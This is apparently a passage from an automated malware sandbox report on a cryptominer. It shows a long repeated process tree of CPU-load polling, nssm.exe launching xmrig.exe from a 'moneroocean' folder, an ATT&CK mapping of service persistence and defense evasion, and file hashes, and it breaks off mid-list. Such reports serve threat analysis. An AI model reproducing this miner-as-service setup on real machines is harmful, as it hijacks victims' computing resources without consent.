                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5052
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:2928
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:664
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1328
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:3364
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3216
                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4848
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:3960
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:3136
                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                        PID:1420
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4968
                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:4564
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1304
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3968
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:2412
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4844
                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4960
                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:2960
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1864
                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2572
                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:3156
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4936
                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1608
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                            PID:1480
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3840
                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:780
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:3516
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:2292
                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1936
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1668
                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4224
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                        PID:3828
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4580
                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4660
                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                            PID:504
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4944
                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5112
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:4528
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:3984
                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3172
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:3612
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:1688
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:520
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                        PID:4332
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:5020
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:4240
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:804
                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1144
                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5092
                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:4356
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1084
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4212
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2748
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:2352
                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:3832
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4724
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:2536
                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                            PID:4992
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5044
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5108
                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                PID:2980
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:1432
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:2952
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                    PID:2824
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1392
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                        PID:3460
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:1328
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:2288
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                            PID:3696
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:4092
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:3960
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                PID:3136
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5056
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:2252
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                    PID:1300
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3512
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\moneroocean\xmrig.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:2004

                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                    System Services

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1569

                                                                                                                                                                                                                                                                                                    Service Execution

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1569.002

                                                                                                                                                                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                                                                                    PowerShell

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1059.001

                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                    Impair Defenses

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1562

                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                                                                    Service Stop

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1489

                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      56efdb5a0f10b5eece165de4f8c9d799

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      fa5de7ca343b018c3bfeab692545eb544c244e16

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      9167fed569788c287fb7dc88a9a92adb

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      25509c090defd8b6ce5dbb5ab720f03c597cde5b

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      5e46423ebbdb363dbb6784ada75727469d7a726fe86fc363bfc70c0ebfef0a3e

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      830cc3d811a62945a143b9d79cb6074281886bc2a0d36351ce3b5ada4d50e112f7f97501fe04c9ebd8cff626f805439f1540b14aca9cdc6ebfe19c1dc8e4fece

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      aca10efc84c640d0df969779b3d53d96

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      a0ceaecb86285e7ae4542266c75120de22b57ae6

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      1f84bce3fe35e883327f48b1b49d57e808993e93ee4119bd145f422f8f35d322

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      0c9e78bad53b4e332b3ce162031289f5ce7e56d61f24656415d75e6e1a7ef106e570eeedf7afdd14889ca98fcce7273ff35b4e8790c3117e77783da338d036e8

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      5d158337cc5927419336c48f33f04acb

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      ee5152f7cb8102b6390756eba97f61add5720e32

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      77bdf78f269cc0fe554f34027260160297a7e1cde75366a6869c47929391b52f

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      7f2055de98d7d68ed66dac706f859a67b203b1d88fdd1e65335b9222ea9e72d3fe8e636a1122f2e2ac4ba11da27f4a28ac53344e55bf6a0d8932253fff0c6094

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      27da7eefbd69d31dba24f9ebbcb62723

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      96266cc0ef60e1b232977a5d26a6a3d8378d323a

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      0beb6effffd0c0c1a5a188169388745d4c05e43276fb7631f2b156a69e21adcf

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      17c84876970354aac616633b6d26533e28685a89914645cf8a7627ff4e5874e8b78a8356e6fdc6c24f47c30b34ff0c0470b8ff8835b446196f5ead5b5dd8ddc9

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      f3e1e093956e25b368d9e26abd745d7e

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      4ccfe102a0cf2e908e45b83866e78ab22c890a4d

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      8a1ae1fac8076cab7421870ec597a6b9fe68cf71b230cb0f3cd328a178cd5e05

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      0fb52a04ac42d4a6e15c4a274a9890ce19685e54908717d5bc205d703b648393f557255fbd7cd03952f15a5257af5c184307868431f9b5677b4ec3737e43697e

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      2c01be267c04267a275208ad55a853ce

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      f4b23d4b0edd120e984dce58ea8acb70ae2e0207

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      1a81e2ca4b461896d8125592a4e5c720ee8ceb7397c29338256f340164b2a698

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      6cda1ae41fa6b4747b415157e6b72335b45329fa145a1aad78e850f522d96313f004830e326be9c1d1949692280bb676d48ff195270b0c6da8841086837da7c7

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6383ebc3526668e0e0c73b7b397fd34b

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      5689025e89050c0940192eadf6cbe884bbdebf0f

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      4826b3831029a48d5120d0c2575bc4c9c7949e8600c4e12452d188005af06595

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      373ae286e67b4096ddbeeaf514f39d7bfc996b67a5bfaf3707777b4baae93620c38a0a976079de2d630d650c47f75579352627090c28c18b8b106a932f1581fc

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      90f994147af96dfa39be6161a90fd0d0

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      e46795501b47bed0f9b70c4b97317917c1563fb4

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      7083e78350194cc9a898f927440230be0e811ecb8dd0534eb47ec1a5be0cf062

                                                                                                                                                                                                                                                                                                      SHA512

